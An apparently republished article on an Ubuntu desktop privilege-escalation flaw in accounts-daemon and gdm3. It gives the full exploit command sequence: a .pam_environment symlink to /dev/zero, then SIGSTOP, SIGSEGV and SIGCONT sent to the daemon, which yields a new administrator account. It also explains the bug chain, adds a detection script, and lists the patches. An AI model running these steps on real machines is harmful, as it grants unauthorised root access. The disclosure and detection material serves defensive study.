Exploiting and Patching Ubuntu’s accounts‑daemon & GDM3 Privilege‑Escalation Flaw

This article explains how a critical Ubuntu vulnerability discovered by security researcher Kevin Backhouse lets a standard user create a sudo‑enabled account without a password, details the step‑by‑step exploitation process, and outlines the official patches that mitigate the issue across affected LTS releases.

ITPUB

Attack Method

Create a symbolic link named .pam_environment in the user’s home directory that points to /dev/zero:

ln -s /dev/zero .pam_environment

If .pam_environment already exists, rename it first to avoid data loss.

Open the GNOME Region & Language settings and attempt to change the language. The dialog will freeze while the accounts-daemon process consumes 100 % CPU.

Remove the symbolic link to stop the daemon from repeatedly reading the malicious file:

rm .pam_environment

Find the PID of accounts-daemon (it appears at the top of top or can be obtained with pidof), then pause it:

pidof accounts-daemon   # e.g. 597
kill -SIGSTOP 597

Schedule a timer that, after logout, sends SIGSEGV to crash the daemon and then SIGCONT to resume it:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &

Log out, wait a few seconds, and the crash forces GNOME to launch gnome-initial-setup, which prompts the creation of a new user account with administrator privileges. The new account can use sudo without a password.

Attack Principle

The exploit chains two bugs in Ubuntu desktop editions:

accounts-daemon (part of accountsservice) reads .pam_environment via the function is_in_pam_environment. With this file linked to /dev/zero, the daemon reads an endless stream of zeros and never leaves the read loop. It has also dropped its root privileges for this operation, which is why a standard user is able to send it the signals used in the steps above.

GNOME Display Manager (gdm3) queries accounts-daemon to determine the number of existing users during the initial‑setup phase. Because the daemon is stuck, gdm3 times out, assumes zero users, and launches gnome-initial-setup, which requires an administrator account.

When accounts-daemon is forced to crash with SIGSEGV, gdm3 believes no users exist and forces the creation of a new admin account, completing the privilege escalation.
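
As an added example (not part of the original article or of the Ubuntu/GNOME patches), the shell functions below flag the precondition of the first bug: a .pam_environment that is a symbolic link or any other non-regular file, such as the link to /dev/zero described above. The function names, and the assumption that home directories sit directly under the directory passed in (for example /home), belong to this example only.

```shell
#!/bin/sh
# Added example: audit home directories for a .pam_environment that is not a
# plain regular file. Function names and directory layout are assumptions.

# classify_pam_env PATH: print one verdict word for PATH.
classify_pam_env() {
    p=$1
    if [ -L "$p" ]; then
        # -c, -b and -p follow the link, so they describe the link target.
        if [ -c "$p" ] || [ -b "$p" ] || [ -p "$p" ]; then
            echo "symlink-to-device"   # e.g. -> /dev/zero, the case in the article
        else
            echo "symlink"             # any other link, including a dangling one
        fi
    elif [ -f "$p" ]; then
        echo "regular"
    elif [ -e "$p" ]; then
        echo "special"                 # device node, FIFO, socket or directory
    else
        echo "absent"
    fi
}

# audit_homes ROOT: check ROOT/*/.pam_environment and print one tab-separated
# line (verdict, path, link target) per finding. Returns 0 only when clean.
audit_homes() {
    root=$1
    findings=0
    for home in "$root"/*/; do
        [ -d "$home" ] || continue     # also skips an unmatched glob
        p="${home}.pam_environment"
        verdict=$(classify_pam_env "$p")
        case $verdict in
            regular|absent) ;;
            *)
                printf '%s\t%s\t%s\n' "$verdict" "$p" "$(readlink -- "$p" 2>/dev/null)"
                findings=$((findings + 1))
                ;;
        esac
    done
    [ "$findings" -eq 0 ]
}
```

Run it as `audit_homes /home`; a non-zero exit status means at least one home directory needs a closer look.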

Official Emergency Fix

The bugs were reported on 17 October by security researcher Kevin Backhouse. Ubuntu and GNOME maintainers have released patches in the latest source code. Users should update their systems immediately.

The vulnerability affects the desktop editions of Ubuntu 20.10, 20.04, 18.04 and 16.04 LTS. Systems running only a command‑line interface or non‑GNOME desktop environments are not vulnerable.

For full technical details see the original security research blog: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
